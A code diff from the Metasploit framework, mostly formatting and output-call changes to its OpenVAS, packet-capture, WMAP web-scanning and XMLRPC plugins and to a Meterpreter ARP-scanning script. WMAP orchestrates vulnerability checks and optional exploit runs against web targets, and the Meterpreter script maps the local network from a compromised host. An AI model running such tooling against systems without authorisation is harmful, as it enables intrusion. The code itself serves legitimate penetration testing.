rids << framework.db.find_or_create_ref(:name => r)
end
vuln.refs << (rids - vuln.refs)
end
end
end
plugins/openvas.rb
+30 -22
View File
@@ -3,7 +3,10 @@
# This plugin provides integration with OpenVAS. Written by kost and
# averagesecurityguy.
#
# Distributed under MIT license:
# $Id$
# $Revision$
#
# Distributed under MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
@@ -34,7 +37,7 @@ class Plugin::OpenVAS < Msf::Plugin
'openvas_task_pause' => "Pause task by ID",
'openvas_task_resume' => "Resume task by ID",
'openvas_task_resume_or_start' => "Resume task or start task by ID",
'openvas_target_create' => "Create target (name, hosts, comment)",
'openvas_target_delete' => "Delete target by ID",
'openvas_target_list' => "Display list of targets",
@@ -43,7 +46,7 @@ class Plugin::OpenVAS < Msf::Plugin
'openvas_format_list' => "Display list of available report formats",
'openvas_report_list' => "Display a list of available report formats",
'openvas_report_list' => "Display a list of available report formats",
'openvas_report_delete' => "Delete a report specified by ID",
'openvas_report_download' => "Save a report to disk",
'openvas_report_import' => "Import report specified by ID into framework",
@@ -172,7 +175,7 @@ class Plugin::OpenVAS < Msf::Plugin
# Make sure the correct number of arguments are present.
if args?(args, 4, 5)
user, pass, host, port, sslv = args
# SSL warning. User is required to confirm.
@@ -199,10 +202,10 @@ class Plugin::OpenVAS < Msf::Plugin
else
print_status("Usage:")
print_status("openvas_connect username password host port <ssl-confirm>")
print_status("openvas_connect username password host port <ssl-confirm>")
end
end
# Disconnect from an OpenVAS manager
def cmd_openvas_disconnect()
return unless openvas?
@@ -216,7 +219,7 @@ class Plugin::OpenVAS < Msf::Plugin
#--------------------------
def cmd_openvas_target_create(*args)
return unless openvas?
if args?(args, 3)
begin
resp = @ov.target_create(args[0], args[1], args[2])
@@ -255,13 +258,14 @@ class Plugin::OpenVAS < Msf::Plugin
'Columns' => ["ID", "Name", "Hosts", "Max Hosts", "In Use", "Comment"])
id = 0
@ov.target_get_all().each do |target|
tbl << [ id, target["name"], target["hosts"], target["max_hosts"],
target["in_use"], target["comment"] ]
tbl << [ id, target["name"], target["hosts"], target["max_hosts"],
target["in_use"], target["comment"] ]
id += 1
end
print_good("OpenVAS list of targets")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -324,8 +328,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of tasks")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -415,15 +420,16 @@ class Plugin::OpenVAS < Msf::Plugin
begin
tbl = Rex::Ui::Text::Table.new(
'Columns' => [ "ID", "Name" ])
id = 0
@ov.configs.each do |config|
tbl << [ id, config["name"] ]
id += 1
end
print_good("OpenVAS list of configs")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -444,8 +450,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of report formats")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -466,8 +473,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of reports")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s
print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -508,7 +516,7 @@ class Plugin::OpenVAS < Msf::Plugin
print_status("Usage: openvas_report_download <report_id> <format_id> <path> <report_name>")
end
end
def cmd_openvas_report_import(*args)
return unless openvas?
@@ -523,7 +531,7 @@ class Plugin::OpenVAS < Msf::Plugin
else
print_status("Usage: openvas_report_import <report_id> <format_id>")
print_status("Only the NBE format is supported for importing.")
end
end
end
end # End OpenVAS class
plugins/pcap_log.rb
+5 -5
View File
@@ -37,7 +37,7 @@ class Plugin::PcapLog < Msf::Plugin
"pcap_iface" => "Set/Get an interface to capture from",
"pcap_start" => "Start a capture",
"pcap_stop" => "Stop a running capture",
"pcap_show_config" => "Show the current PcapLog configuration"
}
end
@@ -59,7 +59,7 @@ class Plugin::PcapLog < Msf::Plugin
def cmd_pcap_iface(*args)
@iface = args[0] || @iface
print_line "#{self.name} Interface: #{@iface}"
print_line "#{self.name} Interface: #{@iface}"
end
def cmd_pcap_start(*args)
@@ -94,7 +94,7 @@ class Plugin::PcapLog < Msf::Plugin
print_line "Capture Stats: #{@pcap.stats.inspect}"
@pcap = nil
@capture_file.close if @capture_file.respond_to? :close
@capture_thread.kill
@capture_thread.kill
@capture_thread = nil
else
print_error "No capture running."
@@ -124,7 +124,7 @@ class Plugin::PcapLog < Msf::Plugin
return [false, msg]
end
# Check directory suitability.
# Check directory suitability.
unless File.directory? @dir
msg = "Invalid pcap directory specified: '#{@dir}'"
return [false, msg]
@@ -170,7 +170,7 @@ class Plugin::PcapLog < Msf::Plugin
end
end
def initialize(framework, opts)
super
add_console_dispatcher(PcapLogDispatcher)
plugins/wmap.rb
+165 -165
View File
@@ -12,9 +12,9 @@ module Msf
class Plugin::Wmap < Msf::Plugin
class WmapCommandDispatcher
attr_accessor :targets
include Msf::Ui::Console::CommandDispatcher
def name
@@ -37,12 +37,12 @@ class Plugin::Wmap < Msf::Plugin
while (arg = args.shift)
case arg
when '-c'
self.targets = {}
when '-c'
self.targets = {}
when '-l'
view_targets
return
when '-t'
when '-t'
process_urls(args.shift)
when '-h'
print_status("Usage: wmap_targets [options]")
@@ -50,7 +50,7 @@ class Plugin::Wmap < Msf::Plugin
print_line("\t-t [urls] Define target sites (vhost1,url[space]vhost2,url) ")
print_line("\t-c Clean target sites list")
print_line("\t-l List all target sites")
print_line("")
return
else
@@ -59,7 +59,7 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
def cmd_wmap_sites(*args)
args.push("-h") if args.length == 0
@@ -68,10 +68,10 @@ class Plugin::Wmap < Msf::Plugin
when '-a'
s = add_web_site(args.shift)
if s
print_status("Site created.")
print_status("Site created.")
else
print_error("Unable to create site")
end
end
when '-l'
view_sites
return
@@ -79,7 +79,7 @@ class Plugin::Wmap < Msf::Plugin
u = args.shift
l = args.shift
s = args.shift
if l == nil or l.empty?
l = 200
s = true
@@ -87,16 +87,16 @@ class Plugin::Wmap < Msf::Plugin
l = l.to_i
s = false
end
view_site_tree(u,l,s)
return
return
when '-h'
print_status("Usage: wmap_sites [options]")
print_line("\t-h Display this help text")
print_line("\t-a [url] Add site (vhost,url)")
print_line("\t-l List all available sites")
print_line("\t-s [urls] (level) Display site structure (vhost,url)")
print_line("")
return
else
@@ -105,7 +105,7 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
def cmd_wmap_run(*args)
# Run exploit check
wmap_check = true
@@ -113,7 +113,7 @@ class Plugin::Wmap < Msf::Plugin
wmap_runexpl = false
# Exit wmap if session is created
wmap_exitifsess = true
# Formating
sizeline = 60
@@ -122,38 +122,38 @@ class Plugin::Wmap < Msf::Plugin
# Exclude files can be modified by setting datastore['WMAP_EXCLUDE']
wmap_exclude_files = '.*\.(gif|jpg|png*)$'
run_wmap_ssl = true
run_wmap_server = true
run_wmap_dir_file = true
run_wmap_query = true
run_wmap_unique_query = true
run_wmap_generic = true
# If module supports datastore['VERBOSE']
moduleverbose = false
showprogress = false
if not run_wmap_ssl
print_status("Loading of wmap ssl modules disabled.")
end
if not run_wmap_server
print_status("Loading of wmap server modules disabled.")
end
if not run_wmap_dir_file
end
if not run_wmap_dir_file
print_status("Loading of wmap dir and file modules disabled.")
end
if not run_wmap_query
print_status("Loading of wmap query modules disabled.")
end
if not run_wmap_unique_query
end
if not run_wmap_unique_query
print_status("Loading of wmap unique query modules disabled.")
end
if not run_wmap_generic
end
if not run_wmap_generic
print_status("Loading of wmap generic modules disabled.")
end
end
stamp = Time.now.to_f
mode = 0
@@ -203,7 +203,7 @@ class Plugin::Wmap < Msf::Plugin
print_status("Using module #{mname}.")
end
using_m = true
when '-h'
print_status("Usage: wmap_run [options]")
print_line("\t-h Display this help text")
@@ -220,30 +220,30 @@ class Plugin::Wmap < Msf::Plugin
print_error("Targets have not been selected.")
return
end
if self.targets.keys.length == 0
if self.targets.keys.length == 0
print_error("Targets have not been selected.")
return
end
self.targets.each_with_index do |t, idx|
selected_host = t[1][:host]
selected_port = t[1][:port]
selected_ssl = t[1][:ssl]
selected_vhost = t[1][:vhost]
print_status ("Testing target:")
print_status ("\tSite: #{selected_vhost} (#{selected_host})")
print_status ("\tPort: #{selected_port} SSL: #{selected_ssl}")
puts '='* sizeline
print_status '='* sizeline
print_status("Testing started. #{(Time.now )}")
if not selected_ssl
run_wmap_ssl = false
#print_status ("Target is not SSL. SSL modules disabled.")
end
# WMAP_DIR, WMAP_FILE
matches = {}
@@ -252,7 +252,7 @@ class Plugin::Wmap < Msf::Plugin
# WMAP_QUERY
matches2 = {}
# WMAP_SSL
matches3 = {}
@@ -279,7 +279,7 @@ class Plugin::Wmap < Msf::Plugin
if penabled
#if ( not using_p or eprofile.include? n.split('/').last ) or (using_m and n.match(mname))
if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p)
if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p)
#
# First run the WMAP_SERVER plugins
#
@@ -307,7 +307,7 @@ class Plugin::Wmap < Msf::Plugin
when :WMAP_SSL
if run_wmap_ssl
matches3[[selected_host,selected_port,selected_ssl,selected_vhost,mtype[1]+'/'+n]]=true
end
end
else
# Black Hole
end
@@ -321,14 +321,14 @@ class Plugin::Wmap < Msf::Plugin
# Handle modules that need to be run before all tests IF SERVER is SSL, once usually again the SSL web server.
# :WMAP_SSL
#
puts "\n=[ SSL testing ]="
puts "=" * sizeline
print_status "\n=[ SSL testing ]="
print_status "=" * sizeline
if not selected_ssl
print_status ("Target is not SSL. SSL modules disabled.")
end
idx = 0
matches3.each_key do |xref|
idx += 1
@@ -377,7 +377,7 @@ class Plugin::Wmap < Msf::Plugin
mod.datastore['VHOST'] = xref[3].to_s
mod.datastore['VERBOSE'] = moduleverbose
mod.datastore['ShowProgress'] = showprogress
#
# Run the plugins that only need to be
# launched once.
@@ -386,7 +386,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_SSL
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -490,14 +490,14 @@ class Plugin::Wmap < Msf::Plugin
end
end
#
# Handle modules that need to be run before all tests, once usually again the web server.
# :WMAP_SERVER
#
puts "\n=[ Web Server testing ]="
puts "=" * sizeline
print_status "\n=[ Web Server testing ]="
print_status "=" * sizeline
idx = 0
matches1.each_key do |xref|
idx += 1
@@ -555,7 +555,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_SERVER
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -663,9 +663,9 @@ class Plugin::Wmap < Msf::Plugin
# Handle modules to be run at every path/file
# WMAP_DIR, WMAP_FILE
#
puts "\n=[ File/Dir testing ]="
puts "=" * sizeline
print_status "\n=[ File/Dir testing ]="
print_status "=" * sizeline
idx = 0
matches.each_key do |xref|
idx += 1
@@ -716,13 +716,13 @@ class Plugin::Wmap < Msf::Plugin
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
puts "Module #{xref[4]}:"
print_status "Module #{xref[4]}:"
test_tree = load_tree(w)
test_tree.each do |node|
p = node.current_path
p = node.current_path
testpath = Pathname.new(p)
strpath = testpath.cleanpath(false).to_s
@@ -830,9 +830,9 @@ class Plugin::Wmap < Msf::Plugin
# Run modules for each request to play with URI with UNIQUE query parameters.
# WMAP_UNIQUE_QUERY
#
puts "\n=[ Unique Query testing ]="
puts "=" * sizeline
print_status "\n=[ Unique Query testing ]="
print_status "=" * sizeline
idx = 0
matches5.each_key do |xref|
idx += 1
@@ -881,50 +881,50 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
utest_query = {}
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
w.web_forms.each do |form|
#
# Only test unique query strings by comparing signature to previous tested signatures 'path,p1,p2,pn'
#
datastr = ""
typestr = ""
typestr = ""
temparr = []
#puts "---------"
#puts form.params
#puts "+++++++++"
#print_status "---------"
#print_status form.params
#print_status "+++++++++"
form.params.each do |p|
pn, pv, pt = p
temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s)
end
datastr = temparr.join("&") if (temparr and not temparr.empty?)
datastr = temparr.join("&") if (temparr and not temparr.empty?)
if (utest_query.has_key?(mod.signature(form.path,datastr)) == false)
mod.datastore['METHOD'] = form.method.upcase
mod.datastore['PATH'] = form.path
mod.datastore['QUERY'] = form.query
if form.method.upcase == 'GET'
mod.datastore['QUERY'] = datastr
mod.datastore['DATA'] = ""
end
mod.datastore['DATA'] = ""
end
mod.datastore['DATA'] = datastr if form.method.upcase == 'POST'
mod.datastore['TYPES'] = typestr
#
# TODO: Add headers, etc.
#
if wtype == :WMAP_UNIQUE_QUERY
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -953,7 +953,7 @@ class Plugin::Wmap < Msf::Plugin
# Unique query tested, actually the value does not matter
#
#print_status("sig: #{mod.signature(form.path,varnarr.join(','))}")
utest_query[mod.signature(form.path,datastr)]=1
else
#print_status("Already tested")
@@ -972,9 +972,9 @@ class Plugin::Wmap < Msf::Plugin
# and will make this shotgun implementation much simple.
# WMAP_QUERY
#
puts "\n=[ Query testing ]="
puts "=" * sizeline
print_status "\n=[ Query testing ]="
print_status "=" * sizeline
idx = 0
matches2.each_key do |xref|
idx += 1
@@ -1026,37 +1026,37 @@ class Plugin::Wmap < Msf::Plugin
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
w.web_forms.each do |req|
datastr = ""
typestr = ""
typestr = ""
temparr = []
req.params.each do |p|
pn, pv, pt = p
temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s)
end
datastr = temparr.join("&") if (temparr and not temparr.empty?)
datastr = temparr.join("&") if (temparr and not temparr.empty?)
mod.datastore['METHOD'] = req.method.upcase
mod.datastore['PATH'] = req.path
if req.method.upcase == 'GET'
mod.datastore['QUERY'] = datastr
mod.datastore['DATA'] = ""
end
mod.datastore['DATA'] = ""
end
mod.datastore['DATA'] = datastr if req.method.upcase == 'POST'
mod.datastore['TYPES'] = typestr
#
# TODO: Add method, headers, etc.
#
if wtype == :WMAP_QUERY
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -1087,16 +1087,16 @@ class Plugin::Wmap < Msf::Plugin
print_status(" >> Exception from #{xref[4]}: #{$!}")
end
end
#
# Handle modules that need to be after all tests, once.
# Good place to have modules that analize the test results and/or
# launch exploits.
# :WMAP_GENERIC
#
puts "\n=[ General testing ]="
puts "=" * sizeline
print_status "\n=[ General testing ]="
print_status "=" * sizeline
idx = 0
matches10.each_key do |xref|
idx += 1
@@ -1146,7 +1146,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_GENERIC
puts "Module #{xref[4]}"
print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -1159,7 +1159,7 @@ class Plugin::Wmap < Msf::Plugin
print_status(" >> Exception during check launch from #{xref[4]}: #{$!}")
end
else
begin
session = mod.run_simple(
'LocalInput' => driver.input,
@@ -1180,22 +1180,22 @@ class Plugin::Wmap < Msf::Plugin
if (mode & wmap_show != 0)
print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds.")
print_status("Done.")
puts "+" * sizeline
puts "\n"
print_status "+" * sizeline
print_status "\n"
end
end
# EOM
end
end
def view_targets
if self.targets == nil or self.targets.keys.length == 0
print_status "No targets have been defined"
return
end
indent = ' '
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => 'Defined targets',
@@ -1213,12 +1213,12 @@ class Plugin::Wmap < Msf::Plugin
tbl << [ idx.to_s, t[1][:vhost], t[1][:host], t[1][:port], t[1][:ssl], t[1][:path].to_s ]
}
puts tbl.to_s + "\n"
print_status tbl.to_s + "\n"
end
def view_sites
indent = ' '
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => 'Available sites',
@@ -1232,11 +1232,11 @@ class Plugin::Wmap < Msf::Plugin
'# Forms',
])
idx = 0
idx = 0
self.framework.db.hosts.each do |bdhost|
bdhost.services.each do |serv|
serv.web_sites.each do |web|
c = web.web_pages.count
c = web.web_pages.count
f = web.web_forms.count
tbl << [ idx.to_s, bdhost.address, web.vhost, serv.port, c.to_s, f.to_s ]
idx += 1
@@ -1244,23 +1244,23 @@ class Plugin::Wmap < Msf::Plugin
end
end
puts tbl.to_s + "\n"
print_status tbl.to_s + "\n"
end
# Reusing code from hdmoore
#
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
def add_web_site(url)
vhost = nil
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
@@ -1281,24 +1281,24 @@ class Plugin::Wmap < Msf::Plugin
uri = URI.parse(url) rescue nil
if not uri
print_error("Could not understand URL: #{url}")
return
return
end
if uri.scheme !~ /^https?/
print_error("Only http and https URLs are accepted: #{url}")
return
end
ssl = false
if uri.scheme == 'https'
ssl = true
end
site = self.framework.db.report_web_site(:wait => true, :host => uri.host, :port => uri.port, :vhost => vhost, :ssl => ssl)
return site
end
# Code by hdm. Modified two lines by et
#
def process_urls(urlstr)
@@ -1309,7 +1309,7 @@ class Plugin::Wmap < Msf::Plugin
urls.each do |url|
next if url.to_s.strip.empty?
vhost = nil
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
@@ -1345,10 +1345,10 @@ class Plugin::Wmap < Msf::Plugin
return if target_whitelist.length == 0
self.targets = {}
target_whitelist.each do |ent|
vhost,target = ent
host = self.framework.db.workspace.hosts.find_by_address(target.host)
if not host
print_error("No matching host for #{target.host}")
@@ -1359,16 +1359,16 @@ class Plugin::Wmap < Msf::Plugin
print_error("No matching service for #{target.host}:#{target.port}")
next
end
#puts "aaa"
#puts framework.db.workspace.name
#print_status "aaa"
#print_status framework.db.workspace.name
#sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address])
sites = serv.web_sites.find(:all)
sites.each do |site|
#site.web_forms.find_all_by_path(target.path).each do |form|
ckey = [ site.vhost, host.address, serv.port, target.path].join("|")
if not self.targets[ckey]
@@ -1389,23 +1389,23 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
def view_site_tree(urlstr, md, ld)
site_whitelist = []
urls = urlstr.to_s.split(/\s+/)
urls.each do |url|
next if url.to_s.strip.empty?
vhost = nil
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
if url !~ /^http/
vhost,url = url.split(",", 2)
if url.to_s.empty?
url = vhost
vhost = nil
@@ -1435,10 +1435,10 @@ class Plugin::Wmap < Msf::Plugin
return if site_whitelist.length == 0
vsites = {}
site_whitelist.each do |ent|
vhost,target = ent
host = self.framework.db.workspace.hosts.find_by_address(target.host)
if not host
print_error("No matching host for #{target.host}")
@@ -1449,14 +1449,14 @@ class Plugin::Wmap < Msf::Plugin
print_error("No matching service for #{target.host}:#{target.port}")
next
end
#puts "aaa"
#puts framework.db.workspace.name
#print_status "aaa"
#print_status framework.db.workspace.name
sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address])
#sites = serv.web_sites.find(:all)
sites.each do |site|
#site.vhost
#site.web_forms.find_all_by_path(target.path).each do |form|
@@ -1466,18 +1466,18 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
#
# Load website structure into a tree
#
def load_tree(s)
pathchr = '/'
wtree = Tree.new(s.vhost)
# Load site pages
# Load site pages
s.web_pages.find(:all, :order => 'path').each do |req|
tarray = req.path.to_s.split(pathchr)
tarray.delete("")
@@ -1487,7 +1487,7 @@ class Plugin::Wmap < Msf::Plugin
tpath = tpath + Pathname.new(df.to_s)
end
end
# Load site forms
s.web_forms.each do |req|
tarray = req.path.to_s.split(pathchr)
@@ -1498,42 +1498,42 @@ class Plugin::Wmap < Msf::Plugin
tpath = tpath + Pathname.new(df.to_s)
end
end
return wtree
end
#
# Print Tree structure. Still ugly
#
def print_tree(tree, maxlevel, limitlevel)
initab = " " * 4
indent = 6
if tree != nil and tree.depth <= maxlevel
print initab + (" " * indent * tree.depth)
if tree.depth > 0
print "|"+("-" * (indent-1))+"/"
print "|"+("-" * (indent-1))+"/"
end
if tree.depth >= 0
if tree.depth >= 0
if tree.depth == 0
print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n"
print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n"
else
c = tree.children.count
if c > 0
print tree.name + " (" + c.to_s+")\n"
else
print tree.name + "\n"
end
end
end
end
tree.children.each_pair do |name,child|
print_tree(child,maxlevel,limitlevel)
end
end
end
#def print_tree(tree)
# if tree.is_leaf? and tree.depth > 0
@@ -1545,7 +1545,7 @@ class Plugin::Wmap < Msf::Plugin
# print_tree(child)
# end
#end
end
class WebTarget < ::Hash
@@ -1554,10 +1554,10 @@ class Plugin::Wmap < Msf::Plugin
"#{proto}://#{self[:host]}:#{self[:port]}#{self[:path]}"
end
end
def initialize(framework, opts)
super
wmapversion = '1.0'
wmapbanner = "[WMAP #{wmapversion}] === et [ ] metasploit.com 2011"
plugins/xmlrpc.rb
+1 -1
View File
@@ -138,7 +138,7 @@ class Plugin::XMLRPC < Msf::Plugin
self.server.add_handler(::XMLRPC::iPIMethods("plugin"),
::Msf::RPC::Plugin.new(*args)
)
# Set the default/catch-all handler
self.server.set_default_handler do |name, *args|
raise ::XMLRPC::FaultException.new(-99, "Method #{name} missing or wrong number of parameters!")
scripts/meterpreter/arp_scanner.rb
+8 -14
View File
@@ -25,6 +25,7 @@ def enum_int
end
end
def arp_scan(cidr)
print_status("ARP Scanning #{cidr}")
ws = client.railgun.ws2_32
@@ -42,27 +43,20 @@ def arp_scan(cidr)
end
iplst.each do |ip_text|
if i < 10
a.push(::Thread.new {
a.push(::Thread.new {
h = ws.inet_addr(ip_text)
ip = h["return"]
h = iphlp.SendARP(ip,0,6,6)
if h["return"] == client.railgun.const("NO_ERROR")
mac = h["pMacAddr"]
print_status("IP: #{ip_text} MAC " +
mac[0].ord.to_s(16) + ":" +
mac[1].ord.to_s(16) + ":" +
mac[2].ord.to_s(16) + ":" +
mac[3].ord.to_s(16) + ":" +
mac[4].ord.to_s(16) + ":" +
mac[5].ord.to_s(16)
)
mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':')
print_status("IP: #{ip_text} MAC #{mac_text}")
found << "#{ip_text}\n"
end
})
i += 1
i += 1
else
sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
i = 0
sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
i = 0
end
end
a.delete_if {|x| not x.alive?} while not a.empty?
@@ -118,4 +112,4 @@ if client.platform =~ /win32|win64/
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
end

Some files were not shown because too many files have changed in this diff Show More